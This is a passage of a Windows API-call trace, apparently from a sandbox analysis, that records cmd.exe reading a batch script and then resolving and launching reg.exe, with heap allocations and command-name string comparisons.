lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x192b [0178.079] ReadFile (in: hFile=0x90, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x43f9efeb30, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efeb30*=0x1fff, lpOverlapped=0x0) returned 1 [0178.079] SetFilePointer (in: hFile=0x90, lDistanceToMove=6488, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x1958 [0178.079] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="start cmd.exe /c \"\"!_batf!\" %_args% -qedit\"\r\n", cbMultiByte=45, lpWideCharStr=0x7ff7bd7209e0, cchWideChar=8191 | out: lpWideCharStr="start cmd.exe /c \"\"!_batf!\" %_args% -qedit\"\r\nD /d \"0\" /f %nul1%\r\n || if not defined quedit (\r\nnfusion that script stopped due to an error\r\n\n") returned 45 [0178.079] _get_osfhandle (_FileHandle=3) returned 0x90 [0178.079] GetFileType (hFile=0x90) returned 0x1 [0178.079] _get_osfhandle (_FileHandle=3) returned 0x90 [0178.079] SetFilePointer (in: hFile=0x90, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x1958 [0178.079] GetProcessHeap () returned 0x19a8f1e0000 [0178.079] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x4012) returned 0x19a8f206860 [0178.080] GetProcessHeap () returned 0x19a8f1e0000 [0178.080] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x4010) returned 0x19a8f20e980 [0178.080] GetProcessHeap () returned 0x19a8f1e0000 [0178.080] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x1c) returned 0x19a8f1eb9e0 [0178.080] GetEnvironmentVariableW (in: lpName="_args", lpBuffer=0x7ff7bd7296a0, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0178.080] _wcsicmp (_String1="_args", _String2="CD") returned -4 [0178.080] _wcsicmp (_String1="_args", _String2="ERRORLEVEL") returned -6 [0178.080] _wcsicmp (_String1="_args", _String2="CMDEXTVERSION") returned -4 [0178.081] _wcsicmp (_String1="_args", _String2="CMDCMDLINE") returned -4 [0178.081] _wcsicmp (_String1="_args", _String2="DATE") returned -5 [0178.081] _wcsicmp (_String1="_args", _String2="TIME") returned -21 [0178.081] _wcsicmp (_String1="_args", _String2="RANDOM") returned -19 [0178.081] _wcsicmp (_String1="_args", _String2="HIGHESTNUMANODENUMBER") returned -9 [0178.081] GetProcessHeap () returned 0x19a8f1e0000 [0178.081] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1eb9e0) returned 1 [0178.081] GetProcessHeap () returned 0x19a8f1e0000 [0178.081] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f20e980) returned 1 [0178.081] GetProcessHeap () returned 0x19a8f1e0000 [0178.082] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f206860) returned 1 [0178.082] GetProcessHeap () returned 0x19a8f1e0000 [0178.082] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xb0) returned 0x19a8f1ee3d0 [0178.082] _wcsicmp (_String1="FOR", _String2="start") returned -13 [0178.082] _wcsicmp (_String1="FOR/?", _String2="start") returned -13 [0178.082] _wcsicmp (_String1="IF", _String2="start") returned -10 [0178.082] _wcsicmp (_String1="IF/?", _String2="start") returned -10 [0178.082] _wcsicmp (_String1="REM", _String2="start") returned -1 [0178.082] _wcsicmp (_String1="REM/?", _String2="start") returned -1 [0178.083] GetProcessHeap () returned 0x19a8f1e0000 [0178.083] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xb0) returned 0x19a8f1edf50 [0178.083] GetProcessHeap () returned 0x19a8f1e0000 [0178.083] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x1c) returned 0x19a8f1eb9e0 [0178.083] GetProcessHeap () returned 0x19a8f1e0000 [0178.083] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x50) returned 0x19a8f1f8880 [0178.083] _get_osfhandle (_FileHandle=3) returned 0x90 [0178.083] SetFilePointer (in: hFile=0x90, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x1958 [0178.083] ReadFile (in: hFile=0x90, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x43f9efeb00, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efeb00*=0x1fff, lpOverlapped=0x0) returned 1 [0178.083] SetFilePointer (in: hFile=0x90, lDistanceToMove=6616, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x19d8 [0178.083] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="rem quickedit reset code is added at the starting of the script instead of here because it takes time to reflect in some cases\r\n", cbMultiByte=128, lpWideCharStr=0x7ff7bd7209e0, cchWideChar=8191 | out: lpWideCharStr="rem quickedit reset code is added at the starting of the script instead of here because it takes time to reflect in some cases\r\n an error\r\n\n") returned 128 [0178.083] _get_osfhandle (_FileHandle=3) returned 0x90 [0178.083] GetFileType (hFile=0x90) returned 0x1 [0178.083] _get_osfhandle (_FileHandle=3) returned 0x90 [0178.083] SetFilePointer (in: hFile=0x90, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x19d8 [0178.083] GetProcessHeap () returned 0x19a8f1e0000 [0178.083] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x4012) returned 0x19a8f206860 [0178.084] GetProcessHeap () returned 0x19a8f1e0000 [0178.084] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f206860) returned 1 [0178.085] GetProcessHeap () returned 0x19a8f1e0000 [0178.085] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xb0) returned 0x19a8f1ee010 [0178.085] _wcsicmp (_String1="FOR", _String2="rem") returned -12 [0178.085] _wcsicmp (_String1="FOR/?", _String2="rem") returned -12 [0178.085] _wcsicmp (_String1="IF", _String2="rem") returned -9 [0178.085] _wcsicmp (_String1="IF/?", _String2="rem") returned -9 [0178.085] _wcsicmp (_String1="REM", _String2="rem") returned 0 [0178.085] _wcsicmp (_String1="REM/?", _String2="rem") returned 47 [0178.085] GetProcessHeap () returned 0x19a8f1e0000 [0178.085] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xb0) returned 0x19a8f1ee850 [0178.085] GetProcessHeap () returned 0x19a8f1e0000 [0178.085] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x18) returned 0x19a8f1ec8c0 [0178.085] GetProcessHeap () returned 0x19a8f1e0000 [0178.085] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x38) returned 0x19a8f1e0cb0 [0178.085] GetProcessHeap () returned 0x19a8f1e0000 [0178.085] RtlReAllocateHeap (Heap=0x19a8f1e0000, Flags=0x0, Ptr=0x19a8f1e0cb0, Size=0x26) returned 0x19a8f1eb6e0 [0178.085] GetProcessHeap () returned 0x19a8f1e0000 [0178.085] RtlSizeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, MemoryPointer=0x19a8f1eb6e0) returned 0x26 [0178.085] GetProcessHeap () returned 0x19a8f1e0000 [0178.085] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x108) returned 0x19a8f1ea8b0 [0178.086] _get_osfhandle (_FileHandle=3) returned 0x90 [0178.086] SetFilePointer (in: hFile=0x90, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x19d8 [0178.086] ReadFile (in: hFile=0x90, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x43f9efead0, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efead0*=0x1fff, lpOverlapped=0x0) returned 1 [0178.086] SetFilePointer (in: hFile=0x90, lDistanceToMove=6625, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x19e1 [0178.086] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="exit /b\r\n", cbMultiByte=9, lpWideCharStr=0x7ff7bd7209e0, cchWideChar=8191 | out: lpWideCharStr="exit /b\r\nedit reset code is added at the starting of the script instead of here because it takes time to reflect in some cases\r\n an error\r\n\n") returned 9 [0178.086] _get_osfhandle (_FileHandle=3) returned 0x90 [0178.086] GetFileType (hFile=0x90) returned 0x1 [0178.086] _get_osfhandle (_FileHandle=3) returned 0x90 [0178.086] SetFilePointer (in: hFile=0x90, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x19e1 [0178.086] GetProcessHeap () returned 0x19a8f1e0000 [0178.086] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x4012) returned 0x19a8f206860 [0178.087] GetProcessHeap () returned 0x19a8f1e0000 [0178.087] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f206860) returned 1 [0178.087] GetProcessHeap () returned 0x19a8f1e0000 [0178.087] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xb0) returned 0x19a8f1ee0d0 [0178.087] _wcsicmp (_String1="FOR", _String2="exit") returned 1 [0178.087] _wcsicmp (_String1="FOR/?", _String2="exit") returned 1 [0178.087] _wcsicmp (_String1="IF", _String2="exit") returned 4 [0178.087] _wcsicmp (_String1="IF/?", _String2="exit") returned 4 [0178.087] _wcsicmp (_String1="REM", _String2="exit") returned 13 [0178.087] _wcsicmp (_String1="REM/?", _String2="exit") returned 13 [0178.087] GetProcessHeap () returned 0x19a8f1e0000 [0178.087] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xb0) returned 0x19a8f1ee190 [0178.087] GetProcessHeap () returned 0x19a8f1e0000 [0178.088] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x1a) returned 0x19a8f1eb710 [0178.088] GetProcessHeap () returned 0x19a8f1e0000 [0178.088] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x18) returned 0x19a8f1ecae0 [0178.088] _get_osfhandle (_FileHandle=3) returned 0x90 [0178.088] SetFilePointer (in: hFile=0x90, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x19e1 [0178.088] ReadFile (in: hFile=0x90, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x43f9efeaa0, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efeaa0*=0x1fff, lpOverlapped=0x0) returned 1 [0178.088] SetFilePointer (in: hFile=0x90, lDistanceToMove=6628, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x19e4 [0178.088] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=")\r\n", cbMultiByte=3, lpWideCharStr=0x7ff7bd7209e0, cchWideChar=8191 | out: lpWideCharStr=")\r\nt /b\r\nedit reset code is added at the starting of the script instead of here because it takes time to reflect in some cases\r\n an error\r\n\n") returned 3 [0178.088] _get_osfhandle (_FileHandle=3) returned 0x90 [0178.088] GetFileType (hFile=0x90) returned 0x1 [0178.088] _get_osfhandle (_FileHandle=3) returned 0x90 [0178.088] SetFilePointer (in: hFile=0x90, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x19e4 [0178.088] GetProcessHeap () returned 0x19a8f1e0000 [0178.088] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x4012) returned 0x19a8f206860 [0178.088] GetProcessHeap () returned 0x19a8f1e0000 [0178.089] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f206860) returned 1 [0178.089] _wcsicmp (_String1="ELSE", _String2="\n") returned 91 [0178.089] _tell (_FileHandle=3) returned 6628 [0178.089] _close (_FileHandle=3) returned 0 [0178.089] GetProcessHeap () returned 0x19a8f1e0000 [0178.089] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x48) returned 0x19a8f1f9590 [0178.089] _pipe (in: _PtHandles=0x19a8f1f95a0, _PipeSize=0x0, _TextMode=32768 | out: _PtHandles=0x19a8f1f95a0) returned 0 [0178.090] _dup (_FileHandle=1) returned 5 [0178.090] _dup2 (_FileHandleSrc=4, _FileHandleDst=1) returned 0 [0178.090] _close (_FileHandle=4) returned 0 [0178.090] _wcsicmp (_String1="reg", _String2="DIR") returned 14 [0178.090] _wcsicmp (_String1="reg", _String2="ERASE") returned 13 [0178.090] _wcsicmp (_String1="reg", _String2="DEL") returned 14 [0178.090] _wcsicmp (_String1="reg", _String2="TYPE") returned -2 [0178.090] _wcsicmp (_String1="reg", _String2="COPY") returned 15 [0178.090] _wcsicmp (_String1="reg", _String2="CD") returned 15 [0178.090] _wcsicmp (_String1="reg", _String2="CHDIR") returned 15 [0178.090] _wcsicmp (_String1="reg", _String2="RENAME") returned -7 [0178.090] _wcsicmp (_String1="reg", _String2="REN") returned -7 [0178.090] _wcsicmp (_String1="reg", _String2="ECHO") returned 13 [0178.090] _wcsicmp (_String1="reg", _String2="SET") returned -1 [0178.090] _wcsicmp (_String1="reg", _String2="PAUSE") returned 2 [0178.090] _wcsicmp (_String1="reg", _String2="DATE") returned 14 [0178.090] _wcsicmp (_String1="reg", _String2="TIME") returned -2 [0178.090] _wcsicmp (_String1="reg", _String2="PROMPT") returned 2 [0178.090] _wcsicmp (_String1="reg", _String2="MD") returned 5 [0178.091] _wcsicmp (_String1="reg", _String2="MKDIR") returned 5 [0178.091] _wcsicmp (_String1="reg", _String2="RD") returned 1 [0178.091] _wcsicmp (_String1="reg", _String2="RMDIR") returned -8 [0178.091] _wcsicmp (_String1="reg", _String2="PATH") returned 2 [0178.091] _wcsicmp (_String1="reg", _String2="GOTO") returned 11 [0178.091] _wcsicmp (_String1="reg", _String2="SHIFT") returned -1 [0178.091] _wcsicmp (_String1="reg", _String2="CLS") returned 15 [0178.091] _wcsicmp (_String1="reg", _String2="CALL") returned 15 [0178.091] _wcsicmp (_String1="reg", _String2="VERIFY") returned -4 [0178.091] _wcsicmp (_String1="reg", _String2="VER") returned -4 [0178.091] _wcsicmp (_String1="reg", _String2="VOL") returned -4 [0178.091] _wcsicmp (_String1="reg", _String2="EXIT") returned 13 [0178.091] _wcsicmp (_String1="reg", _String2="SETLOCAL") returned -1 [0178.091] _wcsicmp (_String1="reg", _String2="ENDLOCAL") returned 13 [0178.091] _wcsicmp (_String1="reg", _String2="TITLE") returned -2 [0178.091] _wcsicmp (_String1="reg", _String2="START") returned -1 [0178.091] _wcsicmp (_String1="reg", _String2="DPATH") returned 14 [0178.091] _wcsicmp (_String1="reg", _String2="KEYS") returned 7 [0178.091] _wcsicmp (_String1="reg", _String2="MOVE") returned 5 [0178.091] _wcsicmp (_String1="reg", _String2="PUSHD") returned 2 [0178.091] _wcsicmp (_String1="reg", _String2="POPD") returned 2 [0178.091] _wcsicmp (_String1="reg", _String2="ASSOC") returned 17 [0178.091] _wcsicmp (_String1="reg", _String2="FTYPE") returned 12 [0178.091] _wcsicmp (_String1="reg", _String2="BREAK") returned 16 [0178.091] _wcsicmp (_String1="reg", _String2="COLOR") returned 15 [0178.092] _wcsicmp (_String1="reg", _String2="MKLINK") returned 5 [0178.092] _wcsicmp (_String1="reg", _String2="DIR") returned 14 [0178.092] _wcsicmp (_String1="reg", _String2="ERASE") returned 13 [0178.092] _wcsicmp (_String1="reg", _String2="DEL") returned 14 [0178.092] _wcsicmp (_String1="reg", _String2="TYPE") returned -2 [0178.092] _wcsicmp (_String1="reg", _String2="COPY") returned 15 [0178.092] _wcsicmp (_String1="reg", _String2="CD") returned 15 [0178.092] _wcsicmp (_String1="reg", _String2="CHDIR") returned 15 [0178.092] _wcsicmp (_String1="reg", _String2="RENAME") returned -7 [0178.092] _wcsicmp (_String1="reg", _String2="REN") returned -7 [0178.092] _wcsicmp (_String1="reg", _String2="ECHO") returned 13 [0178.092] _wcsicmp (_String1="reg", _String2="SET") returned -1 [0178.092] _wcsicmp (_String1="reg", _String2="PAUSE") returned 2 [0178.092] _wcsicmp (_String1="reg", _String2="DATE") returned 14 [0178.092] _wcsicmp (_String1="reg", _String2="TIME") returned -2 [0178.092] _wcsicmp (_String1="reg", _String2="PROMPT") returned 2 [0178.092] _wcsicmp (_String1="reg", _String2="MD") returned 5 [0178.092] _wcsicmp (_String1="reg", _String2="MKDIR") returned 5 [0178.092] _wcsicmp (_String1="reg", _String2="RD") returned 1 [0178.092] _wcsicmp (_String1="reg", _String2="RMDIR") returned -8 [0178.092] _wcsicmp (_String1="reg", _String2="PATH") returned 2 [0178.092] _wcsicmp (_String1="reg", _String2="GOTO") returned 11 [0178.092] _wcsicmp (_String1="reg", _String2="SHIFT") returned -1 [0178.092] _wcsicmp (_String1="reg", _String2="CLS") returned 15 [0178.092] _wcsicmp (_String1="reg", _String2="CALL") returned 15 [0178.092] _wcsicmp (_String1="reg", _String2="VERIFY") returned -4 [0178.093] _wcsicmp (_String1="reg", _String2="VER") returned -4 [0178.093] _wcsicmp (_String1="reg", _String2="VOL") returned -4 [0178.093] _wcsicmp (_String1="reg", _String2="EXIT") returned 13 [0178.093] _wcsicmp (_String1="reg", _String2="SETLOCAL") returned -1 [0178.093] _wcsicmp (_String1="reg", _String2="ENDLOCAL") returned 13 [0178.093] _wcsicmp (_String1="reg", _String2="TITLE") returned -2 [0178.093] _wcsicmp (_String1="reg", _String2="START") returned -1 [0178.093] _wcsicmp (_String1="reg", _String2="DPATH") returned 14 [0178.093] _wcsicmp (_String1="reg", _String2="KEYS") returned 7 [0178.093] _wcsicmp (_String1="reg", _String2="MOVE") returned 5 [0178.093] _wcsicmp (_String1="reg", _String2="PUSHD") returned 2 [0178.093] _wcsicmp (_String1="reg", _String2="POPD") returned 2 [0178.093] _wcsicmp (_String1="reg", _String2="ASSOC") returned 17 [0178.093] _wcsicmp (_String1="reg", _String2="FTYPE") returned 12 [0178.093] _wcsicmp (_String1="reg", _String2="BREAK") returned 16 [0178.093] _wcsicmp (_String1="reg", _String2="COLOR") returned 15 [0178.093] _wcsicmp (_String1="reg", _String2="MKLINK") returned 5 [0178.093] _wcsicmp (_String1="reg", _String2="FOR") returned 12 [0178.093] _wcsicmp (_String1="reg", _String2="IF") returned 9 [0178.094] _wcsicmp (_String1="reg", _String2="REM") returned -6 [0178.094] GetProcessHeap () returned 0x19a8f1e0000 [0178.094] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x4010) returned 0x19a8f206860 [0178.094] _wcsicmp (_String1="reg", _String2="DIR") returned 14 [0178.094] _wcsicmp (_String1="reg", _String2="ERASE") returned 13 [0178.094] _wcsicmp (_String1="reg", _String2="DEL") returned 14 [0178.094] _wcsicmp (_String1="reg", _String2="TYPE") returned -2 [0178.094] _wcsicmp (_String1="reg", _String2="COPY") returned 15 [0178.094] _wcsicmp (_String1="reg", _String2="CD") returned 15 [0178.094] _wcsicmp (_String1="reg", _String2="CHDIR") returned 15 [0178.094] _wcsicmp (_String1="reg", _String2="RENAME") returned -7 [0178.094] _wcsicmp (_String1="reg", _String2="REN") returned -7 [0178.094] _wcsicmp (_String1="reg", _String2="ECHO") returned 13 [0178.094] _wcsicmp (_String1="reg", _String2="SET") returned -1 [0178.094] _wcsicmp (_String1="reg", _String2="PAUSE") returned 2 [0178.094] _wcsicmp (_String1="reg", _String2="DATE") returned 14 [0178.094] _wcsicmp (_String1="reg", _String2="TIME") returned -2 [0178.094] _wcsicmp (_String1="reg", _String2="PROMPT") returned 2 [0178.094] _wcsicmp (_String1="reg", _String2="MD") returned 5 [0178.094] _wcsicmp (_String1="reg", _String2="MKDIR") returned 5 [0178.094] _wcsicmp (_String1="reg", _String2="RD") returned 1 [0178.094] _wcsicmp (_String1="reg", _String2="RMDIR") returned -8 [0178.094] _wcsicmp (_String1="reg", _String2="PATH") returned 2 [0178.095] _wcsicmp (_String1="reg", _String2="GOTO") returned 11 [0178.095] _wcsicmp (_String1="reg", _String2="SHIFT") returned -1 [0178.095] _wcsicmp (_String1="reg", _String2="CLS") returned 15 [0178.095] _wcsicmp (_String1="reg", _String2="CALL") returned 15 [0178.095] _wcsicmp (_String1="reg", _String2="VERIFY") returned -4 [0178.095] _wcsicmp (_String1="reg", _String2="VER") returned -4 [0178.095] _wcsicmp (_String1="reg", _String2="VOL") returned -4 [0178.095] _wcsicmp (_String1="reg", _String2="EXIT") returned 13 [0178.095] _wcsicmp (_String1="reg", _String2="SETLOCAL") returned -1 [0178.095] _wcsicmp (_String1="reg", _String2="ENDLOCAL") returned 13 [0178.095] _wcsicmp (_String1="reg", _String2="TITLE") returned -2 [0178.095] _wcsicmp (_String1="reg", _String2="START") returned -1 [0178.095] _wcsicmp (_String1="reg", _String2="DPATH") returned 14 [0178.095] _wcsicmp (_String1="reg", _String2="KEYS") returned 7 [0178.095] _wcsicmp (_String1="reg", _String2="MOVE") returned 5 [0178.095] _wcsicmp (_String1="reg", _String2="PUSHD") returned 2 [0178.095] _wcsicmp (_String1="reg", _String2="POPD") returned 2 [0178.095] _wcsicmp (_String1="reg", _String2="ASSOC") returned 17 [0178.095] _wcsicmp (_String1="reg", _String2="FTYPE") returned 12 [0178.095] _wcsicmp (_String1="reg", _String2="BREAK") returned 16 [0178.095] _wcsicmp (_String1="reg", _String2="COLOR") returned 15 [0178.095] _wcsicmp (_String1="reg", _String2="MKLINK") returned 5 [0178.095] _wcsnicmp (_String1="reg", _String2="cmd ", _MaxCount=0x4) returned 15 [0178.095] GetProcessHeap () returned 0x19a8f1e0000 [0178.096] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x420) returned 0x19a8f200de0 [0178.096] SetErrorMode (uMode=0x0) returned 0x0 [0178.096] SetErrorMode (uMode=0x1) returned 0x0 [0178.096] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x19a8f200df0, lpFilePart=0x43f9efea40 | out: lpBuffer="C:\\Windows\\System32", lpFilePart=0x43f9efea40*="System32") returned 0x13 [0178.096] SetErrorMode (uMode=0x0) returned 0x1 [0178.096] GetProcessHeap () returned 0x19a8f1e0000 [0178.096] RtlReAllocateHeap (Heap=0x19a8f1e0000, Flags=0x0, Ptr=0x19a8f200de0, Size=0x40) returned 0x19a8f200de0 [0178.096] GetProcessHeap () returned 0x19a8f1e0000 [0178.096] RtlSizeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, MemoryPointer=0x19a8f200de0) returned 0x40 [0178.096] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x7ff7bd7296a0, nSize=0x2000 | out: lpBuffer="") returned 0x58 [0178.096] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0178.096] GetProcessHeap () returned 0x19a8f1e0000 [0178.096] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xee) returned 0x19a8f1fa4f0 [0178.096] GetProcessHeap () returned 0x19a8f1e0000 [0178.096] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x1cc) returned 0x19a8f1eabb0 [0178.096] GetProcessHeap () returned 0x19a8f1e0000 [0178.096] RtlReAllocateHeap (Heap=0x19a8f1e0000, Flags=0x0, Ptr=0x19a8f1eabb0, Size=0xf0) returned 0x19a8f1eabb0 [0178.096] GetProcessHeap () returned 0x19a8f1e0000 [0178.096] RtlSizeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, MemoryPointer=0x19a8f1eabb0) returned 0xf0 [0178.096] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x7ff7bd7296a0, nSize=0x2000 | out: lpBuffer="") returned 0x3a [0178.097] GetProcessHeap () returned 0x19a8f1e0000 [0178.097] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xfc) returned 0x19a8f1eacb0 [0178.097] GetProcessHeap () returned 0x19a8f1e0000 [0178.097] RtlReAllocateHeap (Heap=0x19a8f1e0000, Flags=0x0, Ptr=0x19a8f1eacb0, Size=0x88) returned 0x19a8f1eacb0 [0178.097] GetProcessHeap () returned 0x19a8f1e0000 [0178.097] RtlSizeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, MemoryPointer=0x19a8f1eacb0) returned 0x88 [0178.097] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0178.097] FindFirstFileExW (in: lpFileName="C:\\Windows\\System32\\reg.*" (normalized: "c:\\windows\\system32\\reg.*"), fInfoLevelId=0x1, lpFindFileData=0x43f9efe7c0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x43f9efe7c0) returned 0x19a8f1f8ac0 [0178.097] FindClose (in: hFindFile=0x19a8f1f8ac0 | out: hFindFile=0x19a8f1f8ac0) returned 1 [0178.097] FindFirstFileExW (in: lpFileName="C:\\Windows\\System32\\reg.COM" (normalized: "c:\\windows\\system32\\reg.com"), fInfoLevelId=0x1, lpFindFileData=0x43f9efe7c0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x43f9efe7c0) returned 0xffffffffffffffff [0178.098] GetLastError () returned 0x2 [0178.098] FindFirstFileExW (in: lpFileName="C:\\Windows\\System32\\reg.EXE" (normalized: "c:\\windows\\system32\\reg.exe"), fInfoLevelId=0x1, lpFindFileData=0x43f9efe7c0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x43f9efe7c0) returned 0x19a8f1f8c40 [0178.098] FindClose (in: hFindFile=0x19a8f1f8c40 | out: hFindFile=0x19a8f1f8c40) returned 1 [0178.098] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0178.098] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0178.098] GetProcessHeap () returned 0x19a8f1e0000 [0178.098] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x28) returned 0x19a8f1eb6b0 [0178.098] _get_osfhandle (_FileHandle=2) returned 0x28 [0178.098] _get_osfhandle (_FileHandle=2) returned 0x28 [0178.098] _get_osfhandle (_FileHandle=2) returned 0x28 [0178.098] GetFileType (hFile=0x28) returned 0x2 [0178.098] GetStdHandle (nStdHandle=0xfffffff4) returned 0x28 [0178.098] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0x43f9efea78 | out: lpMode=0x43f9efea78) returned 1 [0178.100] _dup (_FileHandle=2) returned 4 [0178.100] _close (_FileHandle=2) returned 0 [0178.100] _wcsicmp (_String1="nul", _String2="con") returned 11 [0178.100] CreateFileW (lpFileName="nul" (normalized: "\\device\\null"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x43f9efea10, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x28 [0178.100] _open_osfhandle (_OSFileHandle=0x28, _Flags=8) returned 2 [0178.100] GetProcessHeap () returned 0x19a8f1e0000 [0178.101] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x218) returned 0x19a8f20c270 [0178.101] GetProcessHeap () returned 0x19a8f1e0000 [0178.101] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x5e) returned 0x19a8f1ead50 [0178.101] _wcsnicmp (_String1="reg", _String2="cmd ", _MaxCount=0x4) returned 15 [0178.101] GetProcessHeap () returned 0x19a8f1e0000 [0178.101] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x420) returned 0x19a8f200e30 [0178.101] SetErrorMode (uMode=0x0) returned 0x0 [0178.101] SetErrorMode (uMode=0x1) returned 0x0 [0178.101] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x19a8f200e40, lpFilePart=0x43f9efe7d0 | out: lpBuffer="C:\\Windows\\System32", lpFilePart=0x43f9efe7d0*="System32") returned 0x13 [0178.101] SetErrorMode (uMode=0x0) returned 0x1 [0178.101] GetProcessHeap () returned 0x19a8f1e0000 [0178.101] RtlReAllocateHeap (Heap=0x19a8f1e0000, Flags=0x0, Ptr=0x19a8f200e30, Size=0x40) returned 0x19a8f200e30 [0178.101] GetProcessHeap () returned 0x19a8f1e0000 [0178.101] RtlSizeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, MemoryPointer=0x19a8f200e30) returned 0x40 [0178.101] 